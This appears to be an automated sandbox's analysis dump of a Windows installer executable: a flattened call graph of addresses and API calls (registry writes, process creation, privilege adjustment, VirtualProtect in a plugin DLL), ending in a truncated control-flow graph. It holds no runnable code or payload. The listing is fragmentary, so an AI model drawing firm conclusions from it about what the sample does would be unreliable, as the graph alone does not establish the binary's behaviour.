SendMessageW 5281->5283 5285 404eab 5282->5285 5284 404eb0 5283->5284 5283->5285 5284->5282 5285->5270 5298 40653d lstrcpynW 5286->5298 5288 404ee7 5299 406484 wsprintfW 5288->5299 5290 404ef1 5291 40140b 2 API calls 5290->5291 5292 404efa 5291->5292 5300 40653d lstrcpynW 5292->5300 5294 404f01 5294->5272 5301 404d46 5295->5301 5297 404e24 5297->5250 5298->5288 5299->5290 5300->5294 5302 404d5f 5301->5302 5303 40657a 17 API calls 5302->5303 5304 404dc3 5303->5304 5305 40657a 17 API calls 5304->5305 5306 404dce 5305->5306 5307 40657a 17 API calls 5306->5307 5308 404de4 lstrlenW wsprintfW SetDlgItemTextW 5307->5308 5308->5297 5309 404609 lstrlenW 5310 404628 5309->5310 5311 40462a WideCharToMultiByte 5309->5311 5310->5311 5312 40248a 5313 402da6 17 API calls 5312->5313 5314 40249c 5313->5314 5315 402da6 17 API calls 5314->5315 5316 4024a6 5315->5316 5329 402e36 5316->5329 5319 402c2a 5320 4024de 5322 4024ea 5320->5322 5323 402d84 17 API calls 5320->5323 5321 402da6 17 API calls 5325 4024d4 lstrlenW 5321->5325 5324 402509 RegSetValueExW 5322->5324 5326 4032b4 31 API calls 5322->5326 5323->5322 5327 40251f RegCloseKey 5324->5327 5325->5320 5326->5324 5327->5319 5330 402e51 5329->5330 5333 4063d8 5330->5333 5334 4063e7 5333->5334 5335 4063f2 RegCreateKeyExW 5334->5335 5336 4024b6 5334->5336 5335->5336 5336->5319 5336->5320 5336->5321 5337 40498a 5338 4049b6 5337->5338 5339 4049c7 5337->5339 5398 405b81 GetDlgItemTextW 5338->5398 5340 4049d3 GetDlgItem 5339->5340 5373 404a32 5339->5373 5345 4049e7 5340->5345 5342 4049c1 5343 4067c4 5 API calls 5342->5343 5343->5339 5344 4049fb SetWindowTextW 5350 404499 18 API calls 5344->5350 5345->5344 5349 405eb7 4 API calls 5345->5349 5346 404cc5 5348 404500 8 API calls 5346->5348 5353 404cd9 5348->5353 5354 4049f1 5349->5354 5355 404a17 5350->5355 5351 40657a 17 API calls 5356 404aa6 SHBrowseForFolderW 5351->5356 5352 404b46 5357 405f14 18 API calls 5352->5357 5354->5344 5362 405e0c 3 API calls 5354->5362 5358 404499 18 API calls 5355->5358 5359 404b16 5356->5359 5360 404abe CoTaskMemFree 5356->5360 5361 404b4c 5357->5361 5363 404a25 5358->5363 5359->5346 5400 405b81 GetDlgItemTextW 5359->5400 5364 405e0c 3 API calls 5360->5364 5401 40653d lstrcpynW 5361->5401 5362->5344 5399 4044ce SendMessageW 5363->5399 5366 404acb 5364->5366 5370 404b02 SetDlgItemTextW 5366->5370 5374 40657a 17 API calls 5366->5374 5368 404b63 5372 40690a 5 API calls 5368->5372 5369 404a2b 5371 40690a 5 API calls 5369->5371 5370->5359 5371->5373 5380 404b6a 5372->5380 5373->5346 5373->5351 5373->5359 5375 404aea lstrcmpiW 5374->5375 5375->5370 5377 404afb lstrcatW 5375->5377 5376 404bab 5402 40653d lstrcpynW 5376->5402 5377->5370 5379 404bb2 5381 405eb7 4 API calls 5379->5381 5380->5376 5385 405e58 2 API calls 5380->5385 5386 404c03 5380->5386 5382 404bb8 GetDiskFreeSpaceW 5381->5382 5384 404bdc MulDiv 5382->5384 5382->5386 5384->5386 5385->5380 5387 404c74 5386->5387 5389 404e0f 20 API calls 5386->5389 5388 404c97 5387->5388 5391 40140b 2 API calls 5387->5391 5403 4044bb KiUserCallbackDispatcher 5388->5403 5390 404c61 5389->5390 5392 404c76 SetDlgItemTextW 5390->5392 5393 404c66 5390->5393 5391->5388 5392->5387 5395 404d46 20 API calls 5393->5395 5395->5387 5396 404cb3 5396->5346 5397 4048e3 SendMessageW 5396->5397 5397->5346 5398->5342 5399->5369 5400->5352 5401->5368 5402->5379 5403->5396 5404 40290b 5405 402da6 17 API calls 5404->5405 5406 402912 FindFirstFileW 5405->5406 5407 40293a 5406->5407 5411 402925 5406->5411 5409 402943 5407->5409 5412 406484 wsprintfW 5407->5412 5413 40653d lstrcpynW 5409->5413 5412->5409 5413->5411 5414 40190c 5415 401943 5414->5415 5416 402da6 17 API calls 5415->5416 5417 401948 5416->5417 5418 405c49 67 API calls 5417->5418 5419 401951 5418->5419 5420 40190f 5421 402da6 17 API calls 5420->5421 5422 401916 5421->5422 5423 405b9d MessageBoxIndirectW 5422->5423 5424 40191f 5423->5424 5425 401491 5426 40559f 24 API calls 5425->5426 5427 401498 5426->5427 5428 402891 5429 402898 5428->5429 5430 402ba9 5428->5430 5431 402d84 17 API calls 5429->5431 5432 40289f 5431->5432 5433 4028ae SetFilePointer 5432->5433 5433->5430 5434 4028be 5433->5434 5436 406484 wsprintfW 5434->5436 5436->5430 5437 401f12 5438 402da6 17 API calls 5437->5438 5439 401f18 5438->5439 5440 402da6 17 API calls 5439->5440 5441 401f21 5440->5441 5442 402da6 17 API calls 5441->5442 5443 401f2a 5442->5443 5444 402da6 17 API calls 5443->5444 5445 401f33 5444->5445 5446 401423 24 API calls 5445->5446 5447 401f3a 5446->5447 5454 405b63 ShellExecuteExW 5447->5454 5449 401f82 5452 40292e 5449->5452 5455 4069b5 WaitForSingleObject 5449->5455 5451 401f9f CloseHandle 5451->5452 5454->5449 5456 4069cf 5455->5456 5457 4069e1 GetExitCodeProcess 5456->5457 5458 406946 2 API calls 5456->5458 5457->5451 5459 4069d6 WaitForSingleObject 5458->5459 5459->5456 5460 405513 5461 405523 5460->5461 5462 405537 5460->5462 5463 405529 5461->5463 5472 405580 5461->5472 5464 40553f IsWindowVisible 5462->5464 5470 405556 5462->5470 5466 4044e5 SendMessageW 5463->5466 5467 40554c 5464->5467 5464->5472 5465 405585 CallWindowProcW 5468 405533 5465->5468 5466->5468 5469 404e54 5 API calls 5467->5469 5469->5470 5470->5465 5471 404ed4 4 API calls 5470->5471 5471->5472 5472->5465 5473 402f93 5474 402fa5 SetTimer 5473->5474 5475 402fbe 5473->5475 5474->5475 5476 403013 5475->5476 5477 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5475->5477 5477->5476 5478 401d17 5479 402d84 17 API calls 5478->5479 5480 401d1d IsWindow 5479->5480 5481 401a20 5480->5481 4364 403f9a 4365 403fb2 4364->4365 4366 404113 4364->4366 4365->4366 4367 403fbe 4365->4367 4368 404124 GetDlgItem GetDlgItem 4366->4368 4388 404164 4366->4388 4369 403fc9 SetWindowPos 4367->4369 4370 403fdc 4367->4370 4371 404499 18 API calls 4368->4371 4369->4370 4373 403fe5 ShowWindow 4370->4373 4374 404027 4370->4374 4375 40414e SetClassLongW 4371->4375 4378 404100 4373->4378 4379 404005 GetWindowLongW 4373->4379 4380 404046 4374->4380 4381 40402f DestroyWindow 4374->4381 4382 40140b 2 API calls 4375->4382 4376 4041be 4377 40410e 4376->4377 4437 4044e5 4376->4437 4459 404500 4378->4459 4379->4378 4386 40401e ShowWindow 4379->4386 4389 40404b SetWindowLongW 4380->4389 4390 40405c 4380->4390 4387 404422 4381->4387 4382->4388 4383 401389 2 API calls 4384 404196 4383->4384 4384->4376 4391 40419a SendMessageW 4384->4391 4386->4374 4387->4377 4395 404453 ShowWindow 4387->4395 4388->4376 4388->4383 4389->4377 4390->4378 4394 404068 GetDlgItem 4390->4394 4391->4377 4392 40140b 2 API calls 4406 4041d0 4392->4406 4393 404424 DestroyWindow EndDialog 4393->4387 4396 404096 4394->4396 4397 404079 SendMessageW IsWindowEnabled 4394->4397 4395->4377 4399 4040a3 4396->4399 4400 4040ea SendMessageW 4396->4400 4401 4040b6 4396->4401 4411 40409b 4396->4411 4397->4377 4397->4396 4398 40657a 17 API calls 4398->4406 4399->4400 4399->4411 4400->4378 4403 4040d3 4401->4403 4404 4040be 4401->4404 4408 40140b 2 API calls 4403->4408 4453 40140b 4404->4453 4405 4040d1 4405->4378 4406->4377 4406->4392 4406->4393 4406->4398 4409 404499 18 API calls 4406->4409 4428 404364 DestroyWindow 4406->4428 4440 404499 4406->4440 4410 4040da 4408->4410 4409->4406 4410->4378 4410->4411 4456 404472 4411->4456 4413 40424b GetDlgItem 4414 404260 4413->4414 4415 404268 ShowWindow KiUserCallbackDispatcher 4413->4415 4414->4415 4443 4044bb KiUserCallbackDispatcher 4415->4443 4417 404292 EnableWindow 4422 4042a6 4417->4422 4418 4042ab GetSystemMenu EnableMenuItem SendMessageW 4419 4042db SendMessageW 4418->4419 4418->4422 4419->4422 4422->4418 4444 4044ce SendMessageW 4422->4444 4445 403f7b 4422->4445 4448 40653d lstrcpynW 4422->4448 4424 40430a lstrlenW 4425 40657a 17 API calls 4424->4425 4426 404320 SetWindowTextW 4425->4426 4449 401389 4426->4449 4428->4387 4429 40437e CreateDialogParamW 4428->4429 4429->4387 4430 4043b1 4429->4430 4431 404499 18 API calls 4430->4431 4432 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4431->4432 4433 401389 2 API calls 4432->4433 4434 404402 4433->4434 4434->4377 4435 40440a ShowWindow 4434->4435 4436 4044e5 SendMessageW 4435->4436 4436->4387 4438 4044fd 4437->4438 4439 4044ee SendMessageW 4437->4439 4438->4406 4439->4438 4441 40657a 17 API calls 4440->4441 4442 4044a4 SetDlgItemTextW 4441->4442 4442->4413 4443->4417 4444->4422 4446 40657a 17 API calls 4445->4446 4447 403f89 SetWindowTextW 4446->4447 4447->4422 4448->4424 4451 401390 4449->4451 4450 4013fe 4450->4406 4451->4450 4452 4013cb MulDiv SendMessageW 4451->4452 4452->4451 4454 401389 2 API calls 4453->4454 4455 401420 4454->4455 4455->4411 4457 404479 4456->4457 4458 40447f SendMessageW 4456->4458 4457->4458 4458->4405 4460 4045c3 4459->4460 4461 404518 GetWindowLongW 4459->4461 4460->4377 4461->4460 4462 40452d 4461->4462 4462->4460 4463 40455a GetSysColor 4462->4463 4464 40455d 4462->4464 4463->4464 4465 404563 SetTextColor 4464->4465 4466 40456d SetBkMode 4464->4466 4465->4466 4467 404585 GetSysColor 4466->4467 4468 40458b 4466->4468 4467->4468 4469 404592 SetBkColor 4468->4469 4470 40459c 4468->4470 4469->4470 4470->4460 4471 4045b6 CreateBrushIndirect 4470->4471 4472 4045af DeleteObject 4470->4472 4471->4460 4472->4471 5482 73192d43 5483 73192d5b 5482->5483 5484 7319162f 2 API calls 5483->5484 5485 73192d76 5484->5485 5486 401b9b 5487 401ba8 5486->5487 5488 401bec 5486->5488 5491 401c31 5487->5491 5494 401bbf 5487->5494 5489 401bf1 5488->5489 5490 401c16 GlobalAlloc 5488->5490 5500 40239d 5489->5500 5507 40653d lstrcpynW 5489->5507 5493 40657a 17 API calls 5490->5493 5492 40657a 17 API calls 5491->5492 5491->5500 5495 402397 5492->5495 5493->5491 5505 40653d lstrcpynW 5494->5505 5495->5500 5501 405b9d MessageBoxIndirectW 5495->5501 5498 401c03 GlobalFree 5498->5500 5499 401bce 5506 40653d lstrcpynW 5499->5506 5501->5500 5503 401bdd 5508 40653d lstrcpynW 5503->5508 5505->5499 5506->5503 5507->5498 5508->5500 5509 40261c 5510 402da6 17 API calls 5509->5510 5511 402623 5510->5511 5514 40602d GetFileAttributesW CreateFileW 5511->5514 5513 40262f 5514->5513 5515 40149e 5516 4014ac PostQuitMessage 5515->5516 5517 40239d 5515->5517 5516->5517 5518 40259e 5528 402de6 5518->5528 5521 402d84 17 API calls 5522 4025b1 5521->5522 5523 40292e 5522->5523 5524 4025d9 RegEnumValueW 5522->5524 5525 4025cd RegEnumKeyW 5522->5525 5526 4025ee RegCloseKey 5524->5526 5525->5526 5526->5523 5529 402da6 17 API calls 5528->5529 5530 402dfd 5529->5530 5531 4063aa RegOpenKeyExW 5530->5531 5532 4025a8 5531->5532 5532->5521 5533 73191979 5534 7319199c 5533->5534 5535 731919d1 GlobalFree 5534->5535 5536 731919e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5534->5536 5535->5536 5537 73191312 2 API calls 5536->5537 5538 73191b6e GlobalFree GlobalFree 5537->5538 5539 4015a3 5540 402da6 17 API calls 5539->5540 5541 4015aa SetFileAttributesW 5540->5541 5542 4015bc 5541->5542 5543 401fa4 5544 402da6 17 API calls 5543->5544 5545 401faa 5544->5545 5546 40559f 24 API calls 5545->5546 5547 401fb4 5546->5547 5548 405b20 2 API calls 5547->5548 5549 401fba 5548->5549 5550 401fdd CloseHandle 5549->5550 5552 4069b5 5 API calls 5549->5552 5554 40292e 5549->5554 5550->5554 5553 401fcf 5552->5553 5553->5550 5556 406484 wsprintfW 5553->5556 5556->5550 4167 73192a7f 4168 73192acf 4167->4168 4169 73192a8f VirtualProtect 4167->4169 4169->4168 5557 40202a 5558 402da6 17 API calls 5557->5558 5559 402031 5558->5559 5560 40690a 5 API calls 5559->5560 5561 402040 5560->5561 5562 4020cc 5561->5562 5563 40205c GlobalAlloc 5561->5563 5563->5562 5564 402070 5563->5564 5565 40690a 5 API calls 5564->5565 5566 402077 5565->5566 5567 40690a 5 API calls 5566->5567 5568 402081 5567->5568 5568->5562 5572 406484 wsprintfW 5568->5572 5570 4020ba 5573 406484 wsprintfW 5570->5573 5572->5570 5573->5562 5574 40252a 5575 402de6 17 API calls 5574->5575 5576 402534 5575->5576 5577 402da6 17 API calls 5576->5577 5578 40253d 5577->5578 5579 402548 RegQueryValueExW 5578->5579 5581 40292e 5578->5581 5580 402568 5579->5580 5582 40256e RegCloseKey 5579->5582 5580->5582 5585 406484 wsprintfW 5580->5585 5582->5581 5585->5582 5586 4021aa 5587 402da6 17 API calls 5586->5587 5588 4021b1 5587->5588 5589 402da6 17 API calls 5588->5589 5590 4021bb 5589->5590 5591 402da6 17 API calls 5590->5591 5592 4021c5 5591->5592 5593 402da6 17 API calls 5592->5593 5594 4021cf 5593->5594 5595 402da6 17 API calls 5594->5595 5596 4021d9 5595->5596 5597 402218 CoCreateInstance 5596->5597 5598 402da6 17 API calls 5596->5598 5601 402237 5597->5601 5598->5597 5599 401423 24 API calls 5600 4022f6 5599->5600 5601->5599 5601->5600 5602 403baa 5603 403bb5 5602->5603 5604 403bb9 5603->5604 5605 403bbc GlobalAlloc 5603->5605 5605->5604 4483 40352d SetErrorMode GetVersionExW 4484 4035b7 4483->4484 4485 40357f GetVersionExW 4483->4485 4486 403610 4484->4486 4487 40690a 5 API calls 4484->4487 4485->4484 4488 40689a 3 API calls 4486->4488 4487->4486 4489 403626 lstrlenA 4488->4489 4489->4486 4490 403636 4489->4490 4491 40690a 5 API calls 4490->4491 4492 40363d 4491->4492 4493 40690a 5 API calls 4492->4493 4494 403644 4493->4494 4495 40690a 5 API calls 4494->4495 4496 403650 #17 OleInitialize SHGetFileInfoW 4495->4496 4574 40653d lstrcpynW 4496->4574 4499 40369d GetCommandLineW 4575 40653d lstrcpynW 4499->4575 4501 4036af 4502 405e39 CharNextW 4501->4502 4503 4036d5 CharNextW 4502->4503 4513 4036e6 4503->4513 4504 4037e4 4505 4037f8 GetTempPathW 4504->4505 4576 4034fc 4505->4576 4507 403810 4508 403814 GetWindowsDirectoryW lstrcatW 4507->4508 4509 40386a DeleteFileW 4507->4509 4511 4034fc 12 API calls 4508->4511 4586 40307d GetTickCount GetModuleFileNameW 4509->4586 4510 405e39 CharNextW 4510->4513 4514 403830 4511->4514 4513->4504 4513->4510 4517 4037e6 4513->4517 4514->4509 4516 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4514->4516 4515 40387d 4518 403941 4515->4518 4522 405e39 CharNextW 4515->4522 4559 403932 4515->4559 4521 4034fc 12 API calls 4516->4521 4670 40653d lstrcpynW 4517->4670 4678 403b12 4518->4678 4525 403862 4521->4525 4537 40389f 4522->4537 4525->4509 4525->4518 4526 403a69 4685 405b9d 4526->4685 4527 403a7e 4529 403a86 GetCurrentProcess OpenProcessToken 4527->4529 4530 403afc ExitProcess 4527->4530 4535 403acc 4529->4535 4536 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 4529->4536 4532 403908 4539 405f14 18 API calls 4532->4539 4533 403949 4538 405b08 5 API calls 4533->4538 4540 40690a 5 API calls 4535->4540 4536->4535 4537->4532 4537->4533 4541 40394e lstrcatW 4538->4541 4542 403914 4539->4542 4543 403ad3 4540->4543 4545 40396a lstrcatW lstrcmpiW 4541->4545 4546 40395f lstrcatW 4541->4546 4542->4518 4671 40653d lstrcpynW 4542->4671 4544 403ae8 ExitWindowsEx 4543->4544 4547 403af5 4543->4547 4544->4530 4544->4547 4545->4518 4548 40398a 4545->4548 4546->4545 4550 40140b 2 API calls 4547->4550 4551 403996 4548->4551 4552 40398f 4548->4552 4550->4530 4555 405aeb 2 API calls 4551->4555 4554 405a6e 4 API calls 4552->4554 4553 403927 4672 40653d lstrcpynW 4553->4672 4557 403994 4554->4557 4558 40399b SetCurrentDirectoryW 4555->4558 4557->4558 4560 4039b8 4558->4560 4561 4039ad 4558->4561 4614 403bec 4559->4614 4674 40653d lstrcpynW 4560->4674 4673 40653d lstrcpynW 4561->4673 4564 40657a 17 API calls 4565 4039fa DeleteFileW 4564->4565 4566 403a06 CopyFileW 4565->4566 4571 4039c5 4565->4571 4566->4571 4567 403a50 4568 4062fd 36 API calls 4567->4568 4568->4518 4569 4062fd 36 API calls 4569->4571 4570 40657a 17 API calls 4570->4571 4571->4564 4571->4567 4571->4569 4571->4570 4573 403a3a CloseHandle 4571->4573 4675 405b20 CreateProcessW 4571->4675 4573->4571 4574->4499 4575->4501 4577 4067c4 5 API calls 4576->4577 4578 403508 4577->4578 4579 403512 4578->4579 4580 405e0c 3 API calls 4578->4580 4579->4507 4581 40351a 4580->4581 4582 405aeb 2 API calls 4581->4582 4583 403520 4582->4583 4584 40605c 2 API calls 4583->4584 4585 40352b 4584->4585 4585->4507 4689 40602d GetFileAttributesW CreateFileW 4586->4689 4588 4030bd 4606 4030cd 4588->4606 4690 40653d lstrcpynW 4588->4690 4590 4030e3 4591 405e58 2 API calls 4590->4591 4592 4030e9 4591->4592 4691 40653d lstrcpynW 4592->4691 4594 4030f4 GetFileSize 4595 4031ee 4594->4595 4613 40310b 4594->4613 4692 403019 4595->4692 4597 4031f7 4599 403227 GlobalAlloc 4597->4599 4597->4606 4727 4034e5 SetFilePointer 4597->4727 4703 4034e5 SetFilePointer 4599->4703 4601 40325a 4603 403019 6 API calls 4601->4603 4603->4606 4604 403210 4607 4034cf ReadFile 4604->4607 4605 403242 4704 4032b4 4605->4704 4606->4515 4609 40321b 4607->4609 4609->4599 4609->4606 4610 403019 6 API calls 4610->4613 4611 40324e 4611->4606 4611->4611 4612 40328b SetFilePointer 4611->4612 4612->4606 4613->4595 4613->4601 4613->4606 4613->4610 4724 4034cf 4613->4724 4615 40690a 5 API calls 4614->4615 4616 403c00 4615->4616 4617 403c06 4616->4617 4618 403c18 4616->4618 4748 406484 wsprintfW 4617->4748 4619 40640b 3 API calls 4618->4619 4620 403c48 4619->4620 4622 403c67 lstrcatW 4620->4622 4624 40640b 3 API calls 4620->4624 4623 403c16 4622->4623 4733 403ec2 4623->4733 4624->4622 4627 405f14 18 API calls 4628 403c99 4627->4628 4629 403d2d 4628->4629 4631 40640b 3 API calls 4628->4631 4630 405f14 18 API calls 4629->4630 4632 403d33 4630->4632 4633 403ccb 4631->4633 4634 403d43 LoadImageW 4632->4634 4635 40657a 17 API calls 4632->4635 4633->4629 4638 403cec lstrlenW 4633->4638 4642 405e39 CharNextW 4633->4642 4636 403de9 4634->4636 4637 403d6a RegisterClassW 4634->4637 4635->4634 4641 40140b 2 API calls 4636->4641 4639 403da0 SystemParametersInfoW CreateWindowExW 4637->4639 4640 403df3 4637->4640 4643 403d20 4638->4643 4644 403cfa lstrcmpiW 4638->4644 4639->4636 4640->4518 4645 403def 4641->4645 4647 403ce9 4642->4647 4646 405e0c 3 API calls 4643->4646 4644->4643 4648 403d0a GetFileAttributesW 4644->4648 4645->4640 4649 403ec2 18 API calls 4645->4649 4650 403d26 4646->4650 4647->4638 4651 403d16 4648->4651 4652 403e00 4649->4652 4749 40653d lstrcpynW 4650->4749 4651->4643 4654 405e58 2 API calls 4651->4654 4655 403e0c ShowWindow 4652->4655 4656 403e8f 4652->4656 4654->4643 4658 40689a 3 API calls 4655->4658 4741 405672 OleInitialize 4656->4741 4660 403e24 4658->4660 4659 403e95 4661 403eb1 4659->4661 4662 403e99 4659->4662 4663 403e32 GetClassInfoW 4660->4663 4665 40689a 3 API calls 4660->4665 4664 40140b 2 API calls 4661->4664 4662->4640 4668 40140b 2 API calls 4662->4668 4666 403e46 GetClassInfoW RegisterClassW 4663->4666 4667 403e5c DialogBoxParamW 4663->4667 4664->4640 4665->4663 4666->4667 4669 40140b 2 API calls 4667->4669 4668->4640 4669->4640 4670->4505 4671->4553 4672->4559 4673->4560 4674->4571 4676 405b53 CloseHandle 4675->4676 4677 405b5f 4675->4677 4676->4677 4677->4571 4679 403b2a 4678->4679 4680 403b1c CloseHandle 4678->4680 4751 403b57 4679->4751 4680->4679 4683 405c49 67 API calls 4684 403a5e OleUninitialize 4683->4684 4684->4526 4684->4527 4687 405bb2 4685->4687 4686 403a76 ExitProcess 4687->4686 4688 405bc6 MessageBoxIndirectW 4687->4688 4688->4686 4689->4588 4690->4590 4691->4594 4693 403022 4692->4693 4694 40303a 4692->4694 4695 403032 4693->4695 4696 40302b DestroyWindow 4693->4696 4697 403042 4694->4697 4698 40304a GetTickCount 4694->4698 4695->4597 4696->4695 4728 406946 4697->4728 4699 403058 CreateDialogParamW ShowWindow 4698->4699 4700 40307b 4698->4700 4699->4700 4700->4597 4703->4605 4705 4032cd 4704->4705 4706 4032fb 4705->4706 4732 4034e5 SetFilePointer 4705->4732 4708 4034cf ReadFile 4706->4708 4709 403306 4708->4709 4710 403468 4709->4710 4711 403318 GetTickCount 4709->4711 4713 403452 4709->4713 4712 4034aa 4710->4712 4717 40346c 4710->4717 4711->4713 4720 403367 4711->4720 4714 4034cf ReadFile 4712->4714 4713->4611 4714->4713 4715 4034cf ReadFile 4715->4720 4716 4034cf ReadFile 4716->4717 4717->4713 4717->4716 4718 4060df WriteFile 4717->4718 4718->4717 4719 4033bd GetTickCount 4719->4720 4720->4713 4720->4715 4720->4719 4721 4033e2 MulDiv wsprintfW 4720->4721 4723 4060df WriteFile 4720->4723 4722 40559f 24 API calls 4721->4722 4722->4720 4723->4720 4725 4060b0 ReadFile 4724->4725 4726 4034e2 4725->4726 4726->4613 4727->4604 4729 406963 PeekMessageW 4728->4729 4730 403048 4729->4730 4731 406959 DispatchMessageW 4729->4731 4730->4597 4731->4729 4732->4706 4734 403ed6 4733->4734 4750 406484 wsprintfW 4734->4750 4736 403f47 4737 403f7b 18 API calls 4736->4737 4739 403f4c 4737->4739 4738 403c77 4738->4627 4739->4738 4740 40657a 17 API calls 4739->4740 4740->4739 4742 4044e5 SendMessageW 4741->4742 4743 405695 4742->4743 4746 401389 2 API calls 4743->4746 4747 4056bc 4743->4747 4744 4044e5 SendMessageW 4745 4056ce OleUninitialize 4744->4745 4745->4659 4746->4743 4747->4744 4748->4623 4749->4629 4750->4736 4752 403b65 4751->4752 4753 403b2f 4752->4753 4754 403b6a FreeLibrary GlobalFree 4752->4754 4753->4683 4754->4753 4754->4754 5606 73191774 5607 731917a3 5606->5607 5608 73191bff 22 API calls 5607->5608 5609 731917aa 5608->5609 5610 731917bd 5609->5610 5611 731917b1 5609->5611 5613 731917e4 5610->5613 5614 731917c7 5610->5614 5612 73191312 2 API calls 5611->5612 5617 731917bb 5612->5617 5615 731917ea 5613->5615 5616 7319180e 5613->5616 5618 731915dd 3 API calls 5614->5618 5619 73191654 3 API calls 5615->5619 5620 731915dd 3 API calls 5616->5620 5621 731917cc 5618->5621 5622 731917ef 5619->5622 5620->5617 5623 73191654 3 API calls 5621->5623 5624 73191312 2 API calls 5622->5624 5625 731917d2 5623->5625 5626 731917f5 GlobalFree 5624->5626 5627 73191312 2 API calls 5625->5627 5626->5617 5629 73191809 GlobalFree 5626->5629 5628 731917d8 GlobalFree 5627->5628 5628->5617 5629->5617 5630 401a30 5631 402da6 17 API calls 5630->5631 5632 401a39 ExpandEnvironmentStringsW 5631->5632 5633 401a4d 5632->5633 5635 401a60 5632->5635 5634 401a52 lstrcmpW 5633->5634 5633->5635 5634->5635 5636 731923e9 5637 73192453 5636->5637 5638 7319245e GlobalAlloc 5637->5638 5639 7319247d 5637->5639 5638->5637 5645 4023b2 5646 4023c0 5645->5646 5647 4023ba 5645->5647 5649 4023ce 5646->5649 5650 402da6 17 API calls 5646->5650 5648 402da6 17 API calls 5647->5648 5648->5646 5651 4023dc 5649->5651 5652 402da6 17 API calls 5649->5652 5650->5649 5653 402da6 17 API calls 5651->5653 5652->5651 5654 4023e5 WritePrivateProfileStringW 5653->5654 5655 402434 5656 402467 5655->5656 5657 40243c 5655->5657 5659 402da6 17 API calls 5656->5659 5658 402de6 17 API calls 5657->5658 5662 402443 5658->5662 5660 40246e 5659->5660 5666 402e64 5660->5666 5663 40247b 5662->5663 5664 402da6 17 API calls 5662->5664 5665 402454 RegDeleteValueW RegCloseKey 5664->5665 5665->5663 5667 402e71 5666->5667 5668 402e78 5666->5668 5667->5663 5668->5667 5670 402ea9 5668->5670 5671 4063aa RegOpenKeyExW 5670->5671 5672 402ed7 5671->5672 5673 402ee7 RegEnumValueW 5672->5673 5680 402f81 5672->5680 5682 402f0a 5672->5682 5674 402f71 RegCloseKey 5673->5674 5673->5682 5674->5680 5675 402f46 RegEnumKeyW 5676 402f4f RegCloseKey 5675->5676 5675->5682 5677 40690a 5 API calls 5676->5677 5679 402f5f 5677->5679 5678 402ea9 6 API calls 5678->5682 5679->5680 5681 402f63 RegDeleteKeyW 5679->5681 5680->5667 5681->5680 5682->5674 5682->5675 5682->5676 5682->5678 5683 401735 5684 402da6 17 API calls 5683->5684 5685 40173c SearchPathW 5684->5685 5686 401757 5685->5686 5687 4014b8 5688 4014be 5687->5688 5689 401389 2 API calls 5688->5689 5690 4014c6 5689->5690 5691 401d38 5692 402d84 17 API calls 5691->5692 5693 401d3f 5692->5693 5694 402d84 17 API calls 5693->5694 5695 401d4b GetDlgItem 5694->5695 5696 402638 5695->5696 5697 731910e1 5703 73191111 5697->5703 5698 731912b0 GlobalFree 5699 73191240 GlobalFree 5699->5703 5700 731911d7 GlobalAlloc 5700->5703 5701 7319135a 2 API calls 5701->5703 5702 731912ab 5702->5698 5703->5698 5703->5699 5703->5700 5703->5701 5703->5702 5704 73191312 2 API calls 5703->5704 5705 7319129a GlobalFree 5703->5705 5706 73191381 lstrcpyW 5703->5706 5707 7319116b GlobalAlloc 5703->5707 5704->5703 5705->5703 5706->5703 5707->5703 5708 40263e 5709 402652 5708->5709 5710 40266d 5708->5710 5711 402d84 17 API calls 5709->5711 5712 402672 5710->5712 5713 40269d 5710->5713 5721 402659 5711->5721 5714 402da6 17 API calls 5712->5714 5715 402da6 17 API calls 5713->5715 5716 402679 5714->5716 5717 4026a4 lstrlenW 5715->5717 5725 40655f WideCharToMultiByte 5716->5725 5717->5721 5719 40268d lstrlenA 5719->5721 5720 4026e7 5721->5720 5723 40610e 5 API calls 5721->5723 5724 4026d1 5721->5724 5722 4060df WriteFile 5722->5720 5723->5724 5724->5720 5724->5722 5725->5719

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 12 403614 5->12 7 403620-403634 call 40689a lstrlenA 6->7 13 403636-403652 call 40690a * 3 7->13 12->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 26 40365c 21->26 26->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 35 4037f8-403812 GetTempPathW call 4034fc 33->35 36 4036f5-4036fb 34->36 37 4036ee-4036f3 34->37 44 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 35->44 45 40386a-403882 DeleteFileW call 40307d 35->45 39 403702-403706 36->39 40 4036fd-403701 36->40 37->36 37->37 42 4037c6-4037d4 call 405e39 39->42 43 40370c-403712 39->43 40->39 42->32 61 4037d6-4037d7 42->61 47 403714-40371b 43->47 48 40372c-403765 43->48 44->45 64 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 44->64 66 403888-40388e 45->66 67 403a59-403a67 call 403b12 OleUninitialize 45->67 49 403722 47->49 50 40371d-403720 47->50 51 403781-4037bb 48->51 52 403767-40376c 48->52 49->48 50->48 50->49 58 4037c3-4037c5 51->58 59 4037bd-4037c1 51->59 52->51 56 40376e-403776 52->56 62 403778-40377b 56->62 63 40377d 56->63 58->42 59->58 65 4037e6-4037f3 call 40653d 59->65 61->32 62->51 62->63 63->51 64->45 64->67 65->35 71 403894-4038a7 call 405e39 66->71 72 403935-40393c call 403bec 66->72 79 403a69-403a78 call 405b9d ExitProcess 67->79 80 403a7e-403a84 67->80 81 4038f9-403906 71->81 82 4038a9-4038de 71->82 78 403941-403944 72->78 78->67 84 403a86-403a9b GetCurrentProcess OpenProcessToken 80->84 85 403afc-403b04 80->85 89 403908-403916 call 405f14 81->89 90 403949-40395d call 405b08 lstrcatW 81->90 86 4038e0-4038e4 82->86 92 403acc-403ada call 40690a 84->92 93 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 84->93 87 403b06 85->87 88 403b09-403b0c ExitProcess 85->88 94 4038e6-4038eb 86->94 95 